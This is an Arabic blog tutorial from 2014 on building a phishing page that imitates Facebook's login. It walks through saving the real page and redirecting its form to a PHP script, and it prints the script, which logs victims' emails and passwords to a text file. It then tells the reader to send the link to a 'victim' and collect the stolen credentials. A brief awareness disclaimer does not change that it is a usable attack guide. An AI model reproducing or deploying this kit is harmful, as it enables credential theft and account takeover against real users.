dimanche 9 février 2014

صناعة صفحات مزورة لأي موقع


برمجة صفحات مزورة


السلام عليكم ورحمة الله في تدوينة جديدة نناقش فيها قضية الصفحات المزورة و كيفية برمجة صفحة مزورة لأي موقع سواء كان من مواقع التواصل الإجتماعي أو أي موقع اخر يطلب من المستخدم تسجيل الدخول ....

ملاحظة: أنا لست مسؤول عن إستعمالك السيء للدرس أنا فقط أحاول أن أنمي الفكر العربي إلى جانب التوعية ليتمكن الزائر الكريم من تفادي مثل هده الألاعيب لقرصنة حسابه ....



الشرح

أولا أنت بحاجة إلى إستضافة مجانية ترفع عليها صفحتك و ستكون هناك تدوينة إن شاءالله خاصة بكيفية الحصول على إستضافة مجانية .......
سنأخد على سبيل المثال الفيسبوك و نصنع له صفحة مزورة , أول شيء نتوجه إلى موقع الفيسبوك
ثم نقوم بتحميل صفحة البداية ...
لمن لا يعرف ما عليك إلا أن تضغط بزر الفأرة الأيمن على الصفحة و تنقر على "..... Enregistrer sous"
و هده صورة توضيحية :

ونحفظ الصفحة على سطح المكتب بإسم "index.html" أو "index.php"
لا يهم الإسم أو إن كان ملف php أو html ........
الأن نفتح هده الصفحة التي حفظناها في سطح المكتب بأي محرر نصي و من الأفضل أن يكون Notepad++
ثم إضغط على Ctrl+f للبحث في محتوى الصفحة 
 :أدخل في البحث 
وإضغط أنتر ستدهب مباشرة إلى السطر الدي يحتوي على فورم ستجيل الدخول غير محتوى action إلى login.php كما في الصورة التالية :

الأن إحفظ الصفحة و أنشأ ملف نصي جديد بإسم login بصيغة php
أي login.php وانسخ فيه الكود التالي :(ضعه بين وسمي البي أتش بي)


/*coded by icr0hacker*/
/*www.dar-elmaarifa.ml*/
if(isset($_POST['submit']) != true){
$user = $_POST['email'];
$pass = $_POST['pass'];
if (!$user or !$pass){
echo"Please chek the password";
}else{
$put = "email : ".$user." || password : (".$pass.")
";
$file = fopen('password.txt', 'a');
fwrite($file, $put);
fclose($file);
header('Location: http://www.facebook.com/');
}
}

كما في الصورة أدناه (لا تنسا الوسمين شاهد بداية و نهاية الكود في الصورة) :


ثم قم بحفظ الملف و إرفعه على إستضافتك ....
ملاحظة هامة: تأكد من وضع الملف بجانب الصفحة التي حملتها و عدلت عليها مسبقا إلى جانب دلك لا تنسى المجلد الدي يتحمل مع الصفحة و الخاص بملفات الجافا ....

أرسل رابص الصفحة إلى ضحيتك و بعد تأكدك من أنه قد سجل الدخول عليها توجه إلى ملفات المتواجد في إستضافتك المجانية و ستجد ملف بإسم password.tkt بجانب صفحتك يحتوي على المعلومات التي أدخلها الضحية وهي الباس و اليوزر ...

الخاتمة

إلى هنا أصل إلى نهاية التدوينة أتمنى أن تكون أعجبتك كما أتمنى أن تكون قد إستفدت منها و سيكون من الجميل لو نشرت الفائدة بشرك هده التدوينة عبر النقر على أزرار البارتاج أسفله ....
أشكرك عزيزي الزائر على تتبعك و أتمنى لك يوم سعيد ... السلام عليكم






 
X-Steel - Wait